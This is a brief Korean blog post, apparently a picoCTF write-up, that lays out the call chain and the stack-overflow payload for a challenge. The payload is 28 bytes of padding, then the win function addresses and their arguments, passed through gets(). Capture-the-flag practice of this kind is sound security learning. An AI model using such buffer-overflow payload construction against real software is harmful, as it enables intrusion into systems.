호출 순서
main -> vuln -> win_function1 -> win_function2(0xBAAAAAAD) -> flag(0xDEADBAAD)
gets(buf) 후 스택 상태
gets에 넣을 코드
dummy('a'*28) + win_function1 주소 + win_function2 주소 + flag 주소 + win_function2 인자(0xBAAAAAAD) + flag 인자(0xDEADBAAD)
'CTF > picoCTF' 카테고리의 다른 글
| echo back (0) | 2019.01.11 |
|---|---|
| buffer overflow 3 (0) | 2018.12.29 |
| authenticate (0) | 2018.12.28 |
| keygen-me1 (0) | 2018.11.18 |
| assembly4 (0) | 2018.11.18 |
